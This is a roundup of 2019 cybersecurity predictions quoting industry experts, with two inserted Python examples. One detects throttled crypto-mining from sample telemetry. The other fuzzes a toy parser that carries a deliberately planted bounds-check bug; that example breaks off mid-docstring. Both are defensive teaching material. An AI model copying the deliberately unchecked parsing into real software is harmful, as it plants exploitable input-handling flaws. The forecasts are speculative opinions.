From AI-driven chatbots to zero-day mining as a service, via fuzzing and the impact of 5G, the successes and failures of GDPR, loss of faith in the public internet, dire warnings on critical infrastructure vulnerabilities, complexity and the IoT, the predicted rise and predicted fall of data breaches, SIM-jacking and a skills-shortage tipping point, the need for ROI, the death of privacy, our biggest threat identified as failure to evolve, and a host of novel new threats and solutions, this year’s New Year predictions are more extensive than ever.
While cyber-security is fact-based, it also leverages educated guesses by subject experts extrapolating from high-level insider knowledge, observations, analysis and experience, and that is exactly what our roundup of predictions for 2019 provides.
And if any suggestions seem unlikely: this piece is being written while Gatwick International Airport is closed for a second evening due to a drone attack. These predictions cover both the positive and the negative, and in some cases contradict one another; our industry’s job is to bring about the positive and, by being forewarned, prevent or at least mitigate the impact of the negative.
Happy New Year!
AI-driven chatbots go rogue: "Cyber-criminals and black hat hackers will create malicious chatbots on legitimate sites to socially engineer unknowing victims into clicking malicious links, downloading files containing malware, or sharing private information." – WatchGuard Threat Lab.
AI will be used by hackers for most sophisticated cyber-attack ever: "Next year will see the first AI-orchestrated attack take down an FTSE100 company. Creating a new breed of AI-powered malware, hackers will infect an organisation’s systems using the malware and sit undetected gathering information about users’ behaviours and organisations’ systems. Adapting to its surroundings, the malware will unleash a series of bespoke attacks targeted to take down a company from the inside out. The sophistication of this attack will be like none seen before, and organisations must prepare themselves by embracing the technology itself as a method of hitting back and fighting fire with fire." – Jason Hart, CTO, Data Protection at Gemalto.
Artificial intelligence (AI) and machine learning (ML) for adversarial usage: "Cyber-criminals have attained a decent level of proficiency in practical AI/ML usage. Most of the time, they use the emerging technology to better profile their future victims and to accelerate the time, and thus effectiveness, of intrusions. As opposed to many cyber-security startups that often use AI/ML for marketing and investor-relationship purposes, the bad guys are focused on its practical, pragmatic usage to cut their costs and boost income. We will likely see other areas of AI/ML usage by cybercriminals. We will probably have the first cases of simple AI technologies competing against each other in 2019." – Ilia Kolochenko, CEO, High-Tech Bridge.
AI-powered security solutions increasingly adopted to fight escalating threats: "One in four IT pros believe artificial intelligence will have the biggest impact on their business…. to recognise and respond to cyber-threats in real time. Nearly 30 percent of enterprises with 1,000+ employees are currently using AI-powered security solutions, and this number is expected to grow to more than 60 percent by 2020." – Spiceworks research.
AI drives complexity of attacks: "The complexity of attacks will continue to grow as criminals increasingly use artificial intelligence (AI) to conduct their schemes. Banks will receive more fines for money laundering because they will have a decreased ability to protect themselves. Rogue regimes will also use AI to achieve their cyber-crime goals, including election fraud, social media manipulation, money laundering and more. Perhaps worst of all, AI-enabled money laundering will create a greater flow of money to criminal organisations to finance narcotrafficking, human trafficking and terror attacks. On the bright side, new advances and AI technologies will help financial organisations, critical infrastructure, and enterprises to better protect themselves if they choose to deploy such systems." – Mark Gazit, CEO, ThetaRay.
AI and Machine learning combat alert volumes: "Alert volume and fatigue will continue to challenge enterprise security teams in the year ahead. Automating processes through AI and ML will allow security teams to focus on deep investigations, without being bogged down by the sheer volume of incoming information. Increased automation will be critical to reduce fatigue, allow faster detection and deliver better security outcomes." – Anthony Di Bello, senior director, security solutions, OpenText.
AIOps goes from buzzword to baller: "Many core infrastructure platforms have started taking advantage of predictive analytics to improve the datacentre in recent years. Like everything else." – Brad Parks, VP of business development, Morpheus Data.
AI’s absence of real cyber-security will become exposed: "If AI is about reproducing cognition, does cyber-security AI really exist? How will attackers capitalise on a slowdown of AI funding? When we trust in algorithms and analytics to successfully pilot automobiles, provide insight into healthcare decisions and alert security professionals to potential data loss incidents, how far should that trust go?" – Forcepoint.
AI/Machine learning use by adversaries: "Attackers will start to leverage Adversarial machine learning in their attacks to bypass security products reliant exclusively on machine learning for detection of malware." – Dmitri Alperovitch, CTO, CrowdStrike.
Ancient breaches will increasingly come to light: "It takes roughly 100 days from the time a breach occurs to evidence of the attack being detected, and the longer the breach, the more data that is stolen and the more users that are affected, the costlier it is. As organisations adopt machine learning based advanced analytics and security orchestration and automation (SOAR) technology, the mean time to detection will fall and more breaches that are greater than 100 days old, perhaps even longer, will come to light. In 2019, organisations will get better at identifying them." – SecureAuth.
AppSec transformation takes off: "2019 will be the year CISOs, CIOs and CSOs all view DevSecOps as one of their top three investment priorities - and permanently change the way we think about AppSec, and who an AppSec professional is. Responsibility for AppSec will be handed over to Heads of Development, as it transforms officially into DevSec, where identification and remediation lie. 75 percent of developers will begin expecting security intelligence about their code to come from GitHub plugins - and across the development lifecycle. AppSec must live where developers live, and developers must understand security. 2019 will usher this in as a non-negotiable business imperative. …. 2019 will set in motion a massive three- to five-year transformation that will leave current AppSec professionals out of a job by 2024, unless they seriously understand DevOps." – Derek Weeks, VP and DevOps Advocate, Sonatype.
APT and targeted attacks continue to rocket: "We expect a continued uplift and increased technical sophistication as APTs grow in confidence and scope. In addition, non-nation-state targeted attacks, carried out by groups such as Cobalt Gang or Anunak/Carbanak, are also likely to see an increase. Threat intelligence is one tool in a deep defence model which allows for enhanced threat mitigation." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
APTs renew focus on banks: "We expect advanced persistent threats to continue emerging, with a renewed focus on the banking sector, reminiscent of the Carbanak group making headlines in 2014 for using an APT-style campaign to steal money from banks." – Bitdefender.
Attribution of attackers by the US to increase: "It can be difficult to attribute cyber activity with 100 percent certainty – (and) US government officials were also concerned about public demands to respond if they were to attribute an attack. Until recently, the US just didn’t have the tools needed to respond effectively. And many cyber-incidents in recent years were just not worth going to war over. But tools are improving and the US is getting better at other kinds of non-cyber responses, like creating a more robust sanctions regime and criminal indictments. The US is already less afraid of attribution – which we saw last spring when it announced sanctions against Russia in response to attacks on US critical infrastructure. As we continue to improve our non-cyber responses and further develop our cyber-toolbox, we’ll see that the US is less hesitant and more aggressive when it comes to calling out attackers." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Attack threats and methods become ever more sophisticated: "The public cloud will experience a massive security attack that shakes the confidence of all users. Hijack ransoms (of IoT devices), which make a service unavailable until a ransom is paid, and IoT device ransoms, which could force not just companies but also individuals to pay on-the-spot ransoms to regain control.
"The rise of the nation state availability-based attacks will accelerate. Organised groups will create widespread disruption, either as solo endeavours or in conjunction with armed conflicts. Expect more governments to be embarrassed, shamed and manipulated, as well as face physical disruption to services.
"DDoS swarmbots and hivenets will come of age. Cyber-criminals will upgrade IoT-based botnets with swarm-based technology to create more efficient attacks….which can make autonomous decisions with minimal supervision, and use their collective intelligence to opportunistically and simultaneously target vulnerable points in a network. Hivenets are self-learning clusters of compromised devices that simultaneously identify and tackle different attack vectors... use swarm intelligence to act together, recruit and train new members to the hive." – Radware.
Autonomous vehicles drive enormous - potentially vulnerable - data creation: "Cars are on the cusp of Level 3 autonomy, so we can anticipate new workflows for the test vehicles as they push forward from this point. Watch for other vehicles to become autonomous as well in land, sea, and air. Data storage in the form of flash, disk, tape, and the cloud – and the ability to seamlessly move data between these types of storage to balance access and cost factors – will be a key underlying technology supporting automotive vehicle development." – Eric Bassier, senior director, product management and product marketing, Quantum.
Automation-first mindset will propel the DevOps agenda: "As every company becomes a software company in 2019, more and more investment will be placed on an agile DevOps strategy, fuelled by the need to automate. This automation-first mindset will be a major change for most IT teams and will need to be driven by the CIO, along with an injection of fresh talent or a major investment in training for existing IT teams. CIOs should avoid developing their own technology as much as possible. DevOps is about automation, but there are a growing number of excellent tools that engineers can string together to be successful. After a good DevOps model has been adopted by the CIO of an organisation, it’s important to transition to a mindset where the team learns how to leverage existing technologies instead of developing all on their own." – Jesper Frederikson, VP, Okta.
Automation passes the tipping point: "Network administration will be impossible to do without the ability to automate. Not only is it being widely adopted, we’re seeing the adoption of automation across the spectrum of security solutions." – Reuven Harrison, CTO, Tufin.
Automation. Organisations will employ more automation to combat threats: "Organisations need to rethink their strategy to better anticipate threats and to combat the economic motivations forcing cyber-criminals back to the drawing board. Organisations need to embrace automation and AI to shrink the windows from intrusion-to-detection and from detection-to-containment. ... by integrating security elements into a cohesive security fabric that dynamically shares threat information for broad protection and visibility across every network segment from IoT to multi-clouds." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Biometric authentication sees major hack, boosting MFA: "Hackers will take advantage of the false sense of security (biometric authentication) encourages and crack a biometric-only login method at scale to pull off a major attack. As a result, 2019 will see strong growth in the use of multi-factor authentication (MFA) ...particularly push-based authentication and MFA for Cloud application defence." – WatchGuard Threat Lab.
Biometrics - cyber-criminals ‘stealing our faces’: "Biometric identification (including facial recognition software) will be exploited to steal our identities, thereby raising the question of what really defines an identity." – Forcepoint.
Biometrics adoption ubiquitous, but passwords remain: "86 percent of organisations will utilise some form of biometric authentication technology by 2020. But...only 23 percent of IT pros believe biometric authentication will replace traditional text-based passwords in the next two to three years. (Hence) biometric authentication will have to exist side-by-side with traditional passwords — perhaps as a secondary form of authentication." – Spiceworks research.
Blackouts caused by targeted ransomware focused on utilities and ICS: "Targeted ransomware campaigns will cause chaos in 2019 by targeting industrial control systems and public utilities for larger payoffs. The average payment demand will increase by over 6,500 percent, from an average of US$ 300 to US$ 20,000 per attack. These assaults will result in real-world consequences like city-wide blackouts and the loss of access to public utilities." – WatchGuard Threat Lab.
Blockchain adoption rates will double in large enterprises: "25 percent of large enterprises with 5,000+ employees are currently using blockchain-enabled tech. By the end of 2019, we expect blockchain usage in large enterprises to almost double to 48 percent. And by 2020, 56 percent of large enterprises expect to use blockchain in one form or another. Many businesses will likely use private blockchains to share data among other trusted organisations for use cases such as tracking items through a supply chain and proving email isn’t spam." – Spiceworks research.
Boards now acknowledge importance of cyber-security: "Major attacks (are) encouraging members of the C-suite to start asking questions of their own security posture. Meanwhile, the threat of GDPR non-compliance has added an extra fear factor. The potential financial, reputational and business costs mean that 2019 will see CEOs, CFOs and Legal breaking down silos within companies, and assessing how integral cyber-security is to their business strategy. From the other direction, CIOs, CISOs and CTOs will encourage both their peers and the rest of the company to understand the importance of a robust security posture." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
Breaches will only get worse: "2018 wasn’t too kind to companies on the data security front. ... – 2019 will only be worse, fondly remembered for producing a record number of application outages. Highly complex IT environments and applications are being placed under more pressures every day. Pressure to upgrade, improve, comply and, critically, move to the cloud. All this will place a huge burden on already over-stretched IT teams and resources to shift left, to upgrade, migrate and test applications, faster. And threat actors have learned that disrupting a business is just as profitable as exfiltrating data, with ransomware and malware….With the General Data Protection Regulation (GDPR) in play, companies that succumb to the pressure will pay large fines. The first big test of GDPR will be a PR disaster for the unfortunate organisation concerned; not only can they expect to receive the full force of GDPR, the incident will gain far more media coverage than normal and will cause significant brand damage." – Eric Schrock, CTO at Delphix.
Brexit impact on IOT security landscape: "In March, the Department for Digital, Culture, Media and Sport (DCMS) and the National Cyber Security Centre (NCSC) launched its Code of Practice for Consumer Internet of Things (IoT) Security for manufacturers. ….(and it) could be a way for the UK to safeguard its users and businesses in preparation for the post-Brexit state of online affairs. Organisations and institutions should look to deploy an IoT management platform, which provides flexible and scalable identity issuance and management for strong authentication beyond static credentials. Being able to see and secure all IoT devices within one platform is the only way for organisations to take stock of their vulnerable points and adopt measures needed to safeguard them. A key component of this will be digital certificates, which organisations should make use of in order to guarantee the authenticity of their websites. I foresee that they will take their place in business best practices, and UK organisations will be able to forestall an ever-evolving threat landscape such as sophisticated phishing and Business Email Compromise (BEC) attacks amongst others." – Jeremy Boorer, head of EMEA, Sectigo.
Certificates - EV SSL vs. DV SSL impact user confidence in websites: "With free Domain Validation (DV) SSL certificates now available, phishing attacks using these certificates have risen exponentially, as they can now display their phishing site as ‘Secure’, with the result that victims will think the website is safe. However, a browser’s definition of secure is not the same as the common definition of safe. By placing an identifier of the site operator’s genuine identity in the interface of the browser, Extended Validation (EV) SSL complicates the phisher’s task considerably and allows users to spot the difference between one that is real vs. fake. As a result, we will continue to see businesses up their levels of both consumer protection and confidence online by implementing EV certificates." – Tim Callan, senior fellow, Sectigo.
Chat-phish evolves: "Phishing attempts will rapidly evolve, with attackers designing AI-enabled chatbots that can hold a conversation and lure the target into clicking a phishing link. Hackers will explore a wide range of payloads, including manipulation of orders, installation of a remote access trojan, or even extortion." – Bharat Mistry, principal security architect, Trend Micro.
China increases cyber-espionage: "China will continue to ramp up commercial cyber espionage efforts as trade war escalates." – Dmitri Alperovitch, CTO, CrowdStrike.
CIO turnover will increase: "If the CIO cannot deliver, there will be a breakdown in the business relationship and the CEO will look to others to lead the tech agenda. However, those CIOs that are seeing success will advance to even more influential C-level roles at their existing organisations, or move on to the next IT challenge." – Forrester.
Cloud applications will increasingly be specifically targeted: "As more enterprises shift workloads and data to applications like Office 365 and Workday, hackers will start to craft new attacks specific to those apps. Expect to see hackers use special exploits to gain access to the application itself, rather than just user data." – Stan Lowe, CISO, Zscaler.
Cloud. Private cloud takes off: "We’ll see more hybrid environments where private cloud is hosted by a public cloud provider." – Reuven Harrison, CTO, Tufin.
Containers and serverless adoption will make security shift left, but cloud data leaks will continue to grow: "Relying more and more on cloud providers for infrastructure services and adopting microservices and ephemeral serverless functions, the focus will be on application security and how to integrate security on DevOps CI/CD. After the basic S3 buckets were left open to the public with confidential data, we will see more data lake leaks as many enterprises are migrating to the cloud. Misconfigurations on databases, Elastic Search Clusters or Hadoop Clusters will expose big data." – Sergio Loureiro, director cloud solutions, Outpost24.
Cloud. Federation isn’t just for Star Trek: "Debates over public vs. private clouds or AWS vs. Azure have given way to an acceptance that the world is both Hybrid Cloud (on and off-premises) and multi-cloud (taking advantage of multiple platforms). 2019 will see increasing interest in next-gen private clouds as well as increasing need for centralised governance over independent cloud estates. This also means enterprises will be more and more open to wander from the grip of traditional hardware and hypervisor players to find solutions." – Brad Parks, VP of business development, Morpheus Data.
Complexity of corporate IT networks grows exponentially: "Lack of visibility across corporate IT assets... is accountable for the majority of disastrous data breaches that occurred in 2018. The problem will almost certainly persist and exacerbate in 2019. Most modern companies and organisations have very complicated, convoluted and intricate IT infrastructure composed of unconnectable pieces, often located across the world. Shadow systems co-exist with legacy mainframes, abandoned cloud applications and third-party code unmaintained for years. Obviously, such unknown or semi-known systems cannot be protected or secured in any manner. Consequently, they become a very attractive target to run ransomware, phishing or even highly-sophisticated targeted attacks by cyber-criminals. The complexity of corporate networks is growing exponentially, and as it does, so will the problem of visibility. …(making the)... perfect environment to harvest new data breaches and security incidents, let alone non-conformities with GDPR and other regulations." – Ilia Kolochenko, CEO, High-Tech Bridge.
Configuration - the end of the era of direct administration: "By manually configuring/manually updating your deployments – you could be your company’s own worst enemy. Because errors will continue to happen, these manual processes will no longer be permitted. Intermediaries will be needed for any and all configuration changes." – Reuven Harrison, CTO, Tufin.
Containerisation drives App/infrastructure decoupling: "The notion of segmentation moves from the network to the realm of containers. The continual decoupling of application from infrastructure gives new freedoms... immutable infrastructure will take off." – Reuven Harrison, CTO, Tufin.
Crowd security testing morphs into penetration testing: "Bug bounties are trying to reinvent themselves in light of emerging startups in the field and not-for-profit initiatives such as the Open Bug Bounty project. Most crowd security testing companies now offer highly-restricted bug bounties, available only to a small circle of privileged testers. Others already offer process-based fees instead of result-oriented fees. We will likely see crowd security testing ending up as a peculiar metamorphosis of classic penetration testing." – Ilia Kolochenko, CEO, High-Tech Bridge.
Credential theft will continue to rise: "Whether it’s due to highly targeted phishing campaigns, information being passed on to third parties, or machine learning and artificial intelligence being deployed as the next attacking vector, we’ll continue to see soaring figures of breaches in 2019, if advanced identity-security approaches are not taken." – SecureAuth.
"Credential leaks" reduce due to GDPR: "Or at the very least (fewer) make headlines. Security incidents will be more thoroughly contained at an organisation level in an effort to avoid penalties that could force a business into bankruptcy." – Bitdefender.
Critical infrastructure attacks harder to stop due to inter-dependence: "As we move to embrace virtual infrastructure, we are also abandoning that physical redundancy, making it easier for an attacker to have cascading impacts that can cause real damage. With fewer physical controls in place it will be harder to regain control of systems, minimise damage and stop an attack from progressing. It’s important that we realistically assess our dependence upon cyber and the potential consequences of a disruptive attack. Maintaining physical backups or other redundancies, changing operational processes, and even keeping less data can reduce the impact of a successful attack." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Critical infrastructure large-scale attack in UK: "2019 could be the year that we see a large-scale cyber attack on the UK’s critical national infrastructure. The proliferation of internet-connected devices in that infrastructure means there are more opportunities for cyber-criminals to attack. Many of these devices are poorly secured, and pose serious risks to both businesses and individuals. Smart energy meters installed in millions of homes will leave householders vulnerable to cyber-attacks... artificially inflating meter readings, (or)...worst case, ...something more sinister – a catastrophic attack on our electricity grid." – James Wickes, CEO, Cloudview.
Critical infrastructure attack deterrents lessen: "The things that have been holding back Russia, China, North Korea and Iran from a critical infrastructure attack on the U.S. could shift. At the moment, Russia and China have the highest capabilities, but they fall lower on the scale of destructive intent. Of the group, they’re more rational and more dependent on their own critical infrastructure. On the other hand, North Korea and Iran have higher destructive intent, but fall lower on the capabilities scale. But it won’t stay this way forever. The level of destructive intent of Russia and China could change overnight – which is a concern given the capabilities they already have. And North Korea and Iran are strengthening their capabilities every day. Unsophisticated attackers will get better at breaking into OT Networks, but will likely lack the level of sophistication needed to have a significant physical impact. In Russia’s attacks on the Ukrainian power grid, attackers had to thoroughly understand the operations at the targeted plant. That level of sophistication can’t be bought and sold on the internet, which means that the real damage will continue to be done by actors with access to the right skills and resources." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Critical infrastructure threats are not going away, but there is hope: "(Industrial) devices will likely remain an attractive target for those who want to have an impact on the physical world until we come to a place where the security of process control networks (PCN), supervisory control and data acquisition (SCADA) systems, and other industrial control systems (ICS) is put at a higher priority than the ease of use of those systems. Strict access controls and steps to mitigate the threat from malicious insiders would go a long way toward addressing these issues." – ThreatConnect research team.
Cryptocurrency - security disillusionment sets in: "Millions of people have lost their money in cryptocurrencies in 2018. Many due to crypto-exchange hacks or fraud, others were victims of sophisticated spear-phishing targeting their e-wallets, some simply lost their savings with the Bitcoin crash. (Unfortunately)... many victims irrecoverably lost their confidence in blockchain technology in general. It will be time-consuming to restore their trust and convince them to leverage blockchain in other areas of practical applicability. (But)... potential future-victims are now paranoid and won’t be a low-hanging fruit for fraudsters." – Ilia Kolochenko, CEO, High-Tech Bridge.
Crypto-jacking – the new currency: "More and more hackers will hijack cloud accounts to mine cryptocurrency. This helps to save on purchasing the necessary resources and computing power required to mine successfully. Security teams will have a tough task detecting it though – an increase in crypto-jacking malware will occur in 2019, which minimises the risk of detection by throttling resource usage." – Bharat Mistry, principal security architect, Trend Micro.
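The throttling described above defeats the obvious detection, a CPU-spike threshold, because a miner that caps itself at a modest share of one core never trips it. The following is an added example, not code from the article or from Trend Micro: it runs over constructed process telemetry (CPU share and remote port sampled every five minutes) and flags a process either for sitting above a low CPU threshold for an hour or more, or for talking to ports commonly used by stratum mining pools. The process names, the thresholds and the port list are assumptions to be tuned for a real environment.

```python
"""Detect throttled crypto-mining from periodic process telemetry.

Added example, not from the original article. The telemetry rows are
constructed; the CPU threshold, the sustained-window length and the port
list are assumptions a defender would tune for their own estate.
"""
from collections import defaultdict

# TCP ports commonly used by stratum mining pools (assumption; tune locally).
SUSPECT_PORTS = {3333, 4444, 5555, 14444}


def find_miners(samples, cpu_threshold=15.0, min_sustained=12, interval_s=300):
    """Return {(host, process): [reasons]} for processes that look like miners.

    samples: iterable of (ts, host, process, cpu_pct, remote_port) tuples taken
    every interval_s seconds. Rather than looking for a burst of >80% CPU, the
    check looks for CPU held above a low threshold for min_sustained consecutive
    samples (an hour at the defaults), which is what a throttled miner produces,
    and independently for connections to a suspect port.
    """
    per_proc = defaultdict(list)
    for ts, host, proc, cpu, port in sorted(samples):
        per_proc[(host, proc)].append((cpu, port))

    findings = {}
    for key, rows in per_proc.items():
        reasons = []
        run = longest = 0
        for cpu, _ in rows:
            run = run + 1 if cpu >= cpu_threshold else 0
            longest = max(longest, run)
        if longest >= min_sustained:
            reasons.append(f"cpu>={cpu_threshold}% for {longest * interval_s // 60} min")
        ports = {p for _, p in rows if p in SUSPECT_PORTS}
        if ports:
            reasons.append(f"stratum-like port(s) {sorted(ports)}")
        if reasons:
            findings[key] = reasons
    return findings


def constructed_samples():
    """Two hours of constructed telemetry for one host: a throttled miner
    (hypothetical process 'svc-helper'), a browser with two brief spikes, and
    a backup job that runs hot for half an hour then exits."""
    rows = []
    for i in range(24):
        ts = i * 300
        rows.append((ts, "web-01", "svc-helper", 22.0 + (i % 3), 3333 if i % 4 == 0 else 443))
        rows.append((ts, "web-01", "chrome", 90.0 if i in (5, 6) else 4.0, 443))
        rows.append((ts, "web-01", "backup", 85.0 if i < 6 else 0.0, 22))
    return rows


if __name__ == "__main__":
    for (host, proc), reasons in find_miners(constructed_samples()).items():
        print(f"{host} {proc}: " + "; ".join(reasons))
```

Neither signal alone is conclusive: a legitimate service can run at 20% CPU all day, and pool operators can use any port. The value of the sustained-usage rule is that it catches the miner whether or not the port check fires, and the two reasons together give an analyst enough to triage without pulling the binary first.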
Cyber-attack will cause the next public disaster: "The next target will be the UK’s power and telecoms networks. A successful sector-wide attack could cause major disruption to the country, switching off people’s lights, heat and communications. The real threat is that there doesn’t even have to be a large, well-funded terrorist organisation behind it. It could just be a lone gun with the right skills and software." – David Francis, head of security, KCom.
Cyber cold war arrives: "As opportunities for legitimate access (to new technology) dwindle, there will be real incentive to acquire it by nefarious means." – Forcepoint.
Cyber-attacks smarter and more sophisticated: "For many criminal organisations, attack techniques are evaluated not only in terms of their effectiveness, but in the overhead required to develop, modify, and implement them. Many of their attack strategies can be interrupted by addressing the economic model employed by cyber-criminals. Strategic changes to people, processes, and technologies can force some cyber-criminal organisations to rethink the financial value of targeting certain organisations. One way that organisations are doing this is by adopting new technologies and strategies such as machine learning and automation to take on tedious and time-consuming activities that normally require a high degree of human supervision and intervention." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Cyber-criminals find the bar lowered: "Today, any lone hacker can easily acquire hacking tools online via underground hacking communities to attempt their own attacks on an organisation’s network. These communities work collaboratively and are happy to share the latest knowledge and industry intelligence -- along with the latest cyber-weapons – for free or at astonishingly low prices. And with search engines crawling the web 24/7 looking for connected devices and systems with known vulnerabilities to exploit, the effort to find easy targets and gain access to the networks they are connected to is now minimal at best. Hackers have two all-important advantages: ease of access to the free-flowing communal knowledge and illicit tools within their underground communities; and the initiative to decide when and where to apply them. Companies must expect the numbers of cybercriminals to grow, enticed by easy access to guidance and cyber-weapons within underground hacker communities, and the promise of huge volumes of data that is easily monetised or, as in the case of the recent Marriott/Starwood data breach, of enormous potential value to an intelligence service." – Phil Celestini, chief security and risk officer, Syniverse.
DDoS defence spending remains a priority: "A combination of initiatives will be necessary; working with a strategic IT partner can help organisations of any size conduct comprehensive testing and analysis of vulnerabilities to ensure the best levels of prevention against potential threats." – John Williams, product manager, Node.
Defences will become more sophisticated using a range of techniques: Advanced Deception Tactics. "Integrating deception techniques into security strategies to introduce network variations built around false information will force attackers to continually validate their threat intelligence, expend time and resources to detect false positives, and ensure that the networked resources they can see are actually legitimate. Unified Open Collaboration. An effective way to keep up with (criminals making minor changes such as changing IP addresses) is by actively sharing threat intelligence. Open collaboration efforts between threat research organisations, industry alliances, security manufacturers, and law enforcement agencies will significantly shorten the time to detect new threats by exposing and sharing the tactics used by attackers. ... applying behavioural analytics to live data feeds through open collaboration will enable defenders to predict the behaviour of malware." Speed, Integration, and Automation. Use of automation or machine learning requires: "a means to collect, process, and act on threat information in an integrated manner to produce an intelligent response (creating a security fabric) to find and respond to threats at speed and scale. Integration of point products deployed across the distributed network, combined with strategic segmentation will significantly help." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Device as a Service (DaaS) use to increase: "The trend from two-factor to multi-factor authentication on personal devices will continue to grow as security industry bodies like the FIDO Alliance integrate with Windows Hello to enable safer authentication. The rise of smart devices in the home and office that are all interconnected will also introduce security vulnerabilities that will need to be addressed. Companies will need to understand their multi-generational workforce, to better manage and protect devices, as well as develop strong security protocols and practices. Device as a Service (DaaS) will help tackle the security issues of (this) increasingly mobile workforce." – Preben Fjeld, general manager, Lenovo UK.
DevOps collides with cloud management: "The Dev side of the DevOps equation has been moving fast and as the harbinger of digital transformation, DevOps-centric organisations are going to refuse to accept the status quo. IT teams will either embrace and leverage next-generation cloud management to enable developers or they will find themselves wondering what happened to their domain. The same is true for cloud management tools. Ops-centric tools are no longer going to cut it." – Brad Parks, VP of business development, Morpheus Data.
DevOps adoption rates will continue to grow: "More security ‘experts’ will be moved into the DevOps project teams, resulting in a significant increase in a DevSecOps mindset across these enterprises, realising that security is the responsibility of everyone involved in the CI/CD process and not just the IT security team. This will result in a bigger uptake of tools and processes that better support this transformation. Yet there will be an increase in the number of large breaches resulting directly from the reuse of 3rd party or open source software libraries….partly due to the shorter development times the customer markets demand." – Simon Roe, application security product manager, Outpost24.
Digital certificates will evolve: fueled by automation and innovation. "Private, public, and email (S/MIME) certificates, driven by their proven importance to both organisations and users, will become the norm. This means that enterprises will look to manage the lifecycles of all of their certificates from one pane of glass, and that the industry must work to quickly identify and remove from service certificates used for nefarious purposes. …. user safety education and authenticity guarantees will go a long way towards protecting users on the web." – Bill Holtz, CEO, Sectigo.
Digital transformation growth boosts cloud migration security specialists: "As organisations embrace digital transformation, the process of migrating to the cloud has never been under more scrutiny. 2019 will see the rise of a new role for the channel – the Cloud Migration Security Specialist. (Companies will) need help protecting themselves from threats." – Gary Marsden, cloud security solutions, data protection, Gemalto.
Encryption increases as phone-home IOT exploited: "The main problem with 'Phone Home' IoT devices is that their 'Home' can be spoofed. ... - often brought to market too early because they can be upgraded in the field using 'Phone Home'. When 'Home' is spoofed they can be 'upgraded' to whatever the attacker wants. The most common case is leaving the functionality as is, but adding a backchannel proxy so that the attacker can enter an organisation and appear to be on the organisation's network. (GDPR will help drive change)….. I expect to see organisations taking more pro-active steps; first to ensure that there is more encryption of cloud data, and secondly to reduce the number of people that can access that data in the first place." – Andy Harris, CTO, Osirium.
Election interference in Europe: "2019 is the year Europe elects Members of the European Parliament. If recent developments in the US are any indication, we should expect turmoil in Europe, including state-sponsored attacks on voting systems, social media propaganda, and other forms of "meddling." If a few years ago these acts were merely rumored to be occurring, events in the past two years alone confirm that the world’s leading powers will stop at nothing to influence their adversaries’ political outcomes." – Bitdefender.
Election security isn’t bad and it will only get better (in US): "We’re in far better shape today than we were in 2016. I was in charge of cyber and infrastructure security at DHS (Department of Homeland Security, USA) when we officially designated election infrastructure as critical infrastructure. Most security researchers focus on the security of the voting machines themselves, but so much more comes into play and needs to be protected: voter registration databases, the process of loading ballots into the machines, vote tabulation, getting results to the Secretaries of State and to the news networks. ...As awareness has grown, progress has been made – but there’s still much more to be done ... particularly with regard to influence operations from Russia and potentially other adversaries, where the necessary whole-of-nation coordinated response has been absent." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Employment - Favourable job market for IT pros in 2019: "A low unemployment rate and positive GDP growth in the US and parts of Europe bode well for tech workers. ….30 percent of employers plan to grow their IT departments in 2019 (and) ..one in four IT pros plan to look for a new job in 2019; 62 percent of IT pros seeking new employment are doing so primarily to earn a higher salary; 36 percent of IT pros expect to get a raise and 16 percent expect a promotion." – Spiceworks research.
Evolution - inability to evolve is the biggest cyber-security threat: "There isn’t one specific threat that could be deemed the "biggest" in 2019. That said, although adversaries rapidly evolve, the same isn’t necessarily true for their targets, making them a big threat to businesses. It seems that every year, we, as an industry, work to improve cyber-hygiene and educate our staff, and advance our tools, but that it is proving to not be enough. This is where threat intelligence comes into play. Employees and cyber-security organisations that fail to evolve and address the specific threats facing their organisation -- based on the industry they operate in, data they safeguard, organisations they interact with, etc. -- will ultimately pose the greatest risk to that organisation." – ThreatConnect Research Team.
’Fire Sale’ attacks move from fiction to reality: "In the Die Hard movie series, a ‘fire sale’ was a fictional three-pronged cyber attack, targeting a city or state’s transportation operations, financial systems, public utilities and communication infrastructure. Modern cyber security incidents suggest that nation-states and terrorists have developed these capabilities, so 2019 may be the first year one of these multi-pronged attacks is launched to cover up a hidden operation." – WatchGuard Threat Lab.
Fuzzing by criminals increases zero-days: "Strategies will include artificial intelligence fuzzing (AIF), traditionally a sophisticated technique used in lab environments by professional threat researchers to discover vulnerabilities in hardware and software interfaces and applications. (They do this by injecting invalid, unexpected, or semi-random data into an interface or program and then monitoring for events such as crashes, undocumented jumps to debug routines, failing code assertions, and potential memory leaks). As machine learning models are applied to this process we predict that this technique will not only become more efficient and tailored, but available to a wider range of less technical individuals. They will be able to accelerate the process of discovering zero-day vulnerabilities, which will lead to an increase in zero-day attacks targeting different programs and platforms." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
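The loop the quote describes (mutate an input, feed it to the target, and treat anything other than a clean rejection as a finding) fits in a few dozen lines of Python. The block below is an added example, not Fortinet's code or the tooling the quote refers to, and it contains no machine learning: the point is what the loop itself does. The target parser, its planted bug (an unchecked `struct.unpack` on the extended-length path), the `INTERESTING` byte list and the seed input are all constructed for the example.

```python
import random
import struct

# Toy target, constructed for this example: a length-prefixed record parser with one planted
# bug. Format: b"R" | count (1 byte) | count x [len (1 byte) | payload]. A len byte of 0xFF
# means "extended length: the next 4 bytes, little-endian". ValueError is the parser's
# documented way of rejecting bad input; any other exception escaping it is a bug.
def parse_record(data: bytes) -> list:
    if len(data) < 2 or data[0:1] != b"R":
        raise ValueError("bad magic")
    count, off, entries = data[1], 2, []
    for _ in range(count):
        if off >= len(data):
            raise ValueError("truncated header")
        length = data[off]
        off += 1
        if length == 0xFF:
            # BUG: no check that 4 bytes remain, so struct.error escapes on a short input
            length = struct.unpack("<I", data[off:off + 4])[0]
            off += 4
        payload = data[off:off + length]
        if len(payload) != length:
            raise ValueError("truncated payload")
        entries.append(payload)
        off += length
    return entries


INTERESTING = (0x00, 0x01, 0x7F, 0x80, 0xFF)   # boundary values worth trying at every offset


def mutations(seed: bytes, rng: random.Random, random_rounds: int):
    """Yield candidate inputs: a deterministic sweep first (every position x every interesting
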